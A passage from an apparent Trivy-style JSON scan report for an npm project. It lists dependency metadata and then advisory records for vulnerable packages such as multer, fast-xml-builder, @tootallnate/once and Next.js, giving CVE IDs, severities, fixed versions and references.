"pkg:npm/y18n@5.0.8", "UID": "29516b1a4ca967b0" }, "Version": "5.0.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10608, "EndLine": 10617 } ], "AnalyzedBy": "npm" }, { "ID": "yallist@4.0.0", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@4.0.0", "UID": "a4eeca57182b7d99" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10618, "EndLine": 10623 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@15.4.1", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@15.4.1", "UID": "22cd352b04d758a7" }, "Version": "15.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@6.0.0", "decamelize@1.2.0", "find-up@4.1.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "require-main-filename@2.0.0", "set-blocking@2.0.0", "string-width@4.2.3", "which-module@2.0.1", "y18n@4.0.3", "yargs-parser@18.1.3" ], "Locations": [ { "StartLine": 8253, "EndLine": 8274 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@17.7.2", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@17.7.2", "UID": "b8c272e1f872b012" }, "Version": "17.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@8.0.1", "escalade@3.2.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "string-width@4.2.3", "y18n@5.0.8", "yargs-parser@21.1.1" ], "Locations": [ { "StartLine": 10624, "EndLine": 10642 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@18.1.3", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@18.1.3", "UID": "ecc16404dd3eeba6" }, "Version": "18.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "decamelize@1.2.0" ], "Locations": [ { "StartLine": 8275, "EndLine": 8287 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@21.1.1", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@21.1.1", "UID": "6f7dba94058c5219" }, "Version": "21.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10643, "EndLine": 10652 } ], "AnalyzedBy": "npm" }, { "ID": "yocto-queue@0.1.0", "Name": "yocto-queue", "Identifier": { "PURL": "pkg:npm/yocto-queue@0.1.0", "UID": "93e5e9e74f78ff9b" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10663, "EndLine": 10675 } ], "AnalyzedBy": "npm" }, { "ID": "yoga-layout@2.0.1", "Name": "yoga-layout", "Identifier": { "PURL": "pkg:npm/yoga-layout@2.0.1", "UID": "fbab78ef81b1ea22" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10676, "EndLine": 10681 } ], "AnalyzedBy": "npm" }, { "ID": "zod@3.25.76", "Name": "zod", "Identifier": { "PURL": "pkg:npm/zod@3.25.76", "UID": "c3a2a28a4229a952" }, "Version": "3.25.76", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10682, "EndLine": 10690 } ], "AnalyzedBy": "npm" } ], "Vulnerabilities": [ { "VulnerabilityID": "CVE-2026-3449", "VendorIDs": [ "GHSA-vpq2-c234-7xj6" ], "PkgID": "@tootallnate/once@2.0.0", "PkgName": "@tootallnate/once", "PkgIdentifier": { "PURL": "pkg:npm/%40tootallnate/once@2.0.0", "UID": "22f57853d23edc3a" }, "InstalledVersion": "2.0.0", "FixedVersion": "3.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109", "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", "Severity": "LOW", "CweIDs": [ "CWE-705" ], "VendorSeverity": { "ghsa": 1, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", "V3Score": 3.3, "V40Score": 1.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3449", "https://github.com/TooTallNate/once", "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", "https://github.com/TooTallNate/once/issues/8", "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", "https://www.cve.org/CVERecord?id=CVE-2026-3449" ], "PublishedDate": "2026-03-03T05:17:25.017Z", "LastModifiedDate": "2026-05-19T15:38:48.397Z" }, { "VulnerabilityID": "CVE-2026-44665", "VendorIDs": [ "GHSA-5wm8-gmm8-39j9" ], "PkgID": "fast-xml-builder@1.1.5", "PkgName": "fast-xml-builder", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "e589910a79395ad7" }, "InstalledVersion": "1.1.5", "FixedVersion": "1.1.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44665", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763", "Title": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", "Description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", "Severity": "HIGH", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V3Score": 6.1, "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44665", "https://github.com/NaturalIntelligence/fast-xml-builder", "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", "https://nvd.nist.gov/vuln/detail/CVE-2026-44665", "https://www.cve.org/CVERecord?id=CVE-2026-44665" ], "PublishedDate": "2026-05-13T16:16:59.093Z", "LastModifiedDate": "2026-05-18T16:16:31.7Z" }, { "VulnerabilityID": "CVE-2026-44664", "VendorIDs": [ "GHSA-45c6-75p6-83cc" ], "PkgID": "fast-xml-builder@1.1.5", "PkgName": "fast-xml-builder", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "e589910a79395ad7" }, "InstalledVersion": "1.1.5", "FixedVersion": "1.1.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44664", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80", "Title": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", "Description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., ---\u003e...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", "Severity": "MEDIUM", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44664", "https://github.com/NaturalIntelligence/fast-xml-builder", "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", "https://nvd.nist.gov/vuln/detail/CVE-2026-44664", "https://www.cve.org/CVERecord?id=CVE-2026-44664" ], "PublishedDate": "2026-05-13T16:16:58.937Z", "LastModifiedDate": "2026-05-13T16:58:09.717Z" }, { "VulnerabilityID": "CVE-2025-47935", "VendorIDs": [ "GHSA-44fp-w29j-9vj5" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47935", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b", "Title": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-401" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "https://github.com/expressjs/multer/pull/1120", "https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5", "https://nvd.nist.gov/vuln/detail/CVE-2025-47935" ], "PublishedDate": "2025-05-19T20:15:25.863Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2025-47944", "VendorIDs": [ "GHSA-4pg4-qvpc-4q3h" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47944", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598", "Title": "Multer vulnerable to Denial of Service from maliciously crafted requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "https://github.com/expressjs/multer/issues/1176", "https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h", "https://nvd.nist.gov/vuln/detail/CVE-2025-47944" ], "PublishedDate": "2025-05-19T20:15:26.007Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2025-48997", "VendorIDs": [ "GHSA-g5hg-p3ph-g8qg" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48997", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac", "Title": "multer: Multer vulnerable to Denial of Service via unhandled exception", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-48997", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9", "https://github.com/expressjs/multer/issues/1233", "https://github.com/expressjs/multer/pull/1256", "https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg", "https://nvd.nist.gov/vuln/detail/CVE-2025-48997", "https://www.cve.org/CVERecord?id=CVE-2025-48997" ], "PublishedDate": "2025-06-03T19:15:39.577Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2025-7338", "VendorIDs": [ "GHSA-fjgf-rc76-4x9p" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.0.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-7338", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782", "Title": "multer: Multer Denial of Service", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-248" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-7338", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b", "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p", "https://nvd.nist.gov/vuln/detail/CVE-2025-7338", "https://www.cve.org/CVERecord?id=CVE-2025-7338" ], "PublishedDate": "2025-07-17T16:15:35.227Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2026-2359", "VendorIDs": [ "GHSA-v52c-386h-88mc" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2359", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd", "Title": "multer: Multer: Denial of Service via dropped file upload connections", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-772" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-2359", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab", "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc", "https://nvd.nist.gov/vuln/detail/CVE-2026-2359", "https://www.cve.org/CVERecord?id=CVE-2026-2359" ], "PublishedDate": "2026-02-27T16:16:25.467Z", "LastModifiedDate": "2026-03-19T17:28:16.05Z" }, { "VulnerabilityID": "CVE-2026-3304", "VendorIDs": [ "GHSA-xf7r-hgr6-v32p" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3304", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712", "Title": "multer: Multer: Denial of Service via malformed requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-459" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3304", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee", "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p", "https://nvd.nist.gov/vuln/detail/CVE-2026-3304", "https://www.cve.org/CVERecord?id=CVE-2026-3304" ], "PublishedDate": "2026-02-27T16:16:26.38Z", "LastModifiedDate": "2026-03-19T17:28:33.81Z" }, { "VulnerabilityID": "CVE-2026-3520", "VendorIDs": [ "GHSA-5528-5vmv-3xc2" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3520", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530", "Title": "multer: Multer: Denial of Service via malformed requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3520", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752", "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2", "https://nvd.nist.gov/vuln/detail/CVE-2026-3520", "https://www.cve.org/CVERecord?id=CVE-2026-3520" ], "PublishedDate": "2026-03-04T17:16:22.61Z", "LastModifiedDate": "2026-03-09T18:03:23.1Z" }, { "VulnerabilityID": "CVE-2025-29927", "VendorIDs": [ "GHSA-f82v-jwr5-mffw" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.9, 14.2.25, 15.2.3, 12.3.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-29927", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007", "Title": "nextjs: Authorization Bypass in Next.js Middleware", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", "Severity": "CRITICAL", "CweIDs": [ "CWE-285", "CWE-863" ], "VendorSeverity": { "ghsa": 4, "redhat": 4 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 } }, "References": [ "http://www.openwall.com/lists/oss-security/2025/03/23/3", "http://www.openwall.com/lists/oss-security/2025/03/23/4", "https://access.redhat.com/security/cve/CVE-2025-29927", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2", "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48", "https://github.com/vercel/next.js/releases/tag/v12.3.5", "https://github.com/vercel/next.js/releases/tag/v13.5.9", "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw", "https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/", "https://nvd.nist.gov/vuln/detail/CVE-2025-29927", "https://security.netapp.com/advisory/ntap-20250328-0002", "https://security.netapp.com/advisory/ntap-20250328-0002/", "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware", "https://www.cve.org/CVERecord?id=CVE-2025-29927" ], "PublishedDate": "2025-03-21T15:15:42.66Z", "LastModifiedDate": "2025-09-10T15:49:40.637Z" }, { "VulnerabilityID": "CVE-2024-46982", "VendorIDs": [ "GHSA-gp8f-8m3g-qvj9" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.7, 14.2.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-46982", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084", "Title": "Next.js Cache Poisoning", "Description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, \u0026 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", "Severity": "HIGH", "CweIDs": [ "CWE-639" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V3Score": 7.5, "V40Score": 8.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3", "https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda", "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9", "https://nvd.nist.gov/vuln/detail/CVE-2024-46982" ], "PublishedDate": "2024-09-17T22:15:02.273Z", "LastModifiedDate": "2025-09-10T15:46:05.173Z" }, { "VulnerabilityID": "CVE-2024-51479", "VendorIDs": [ "GHSA-7gfc-8cq8-jh5f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.15", "Status": "fixed", "SeveritySource": "ghsa", 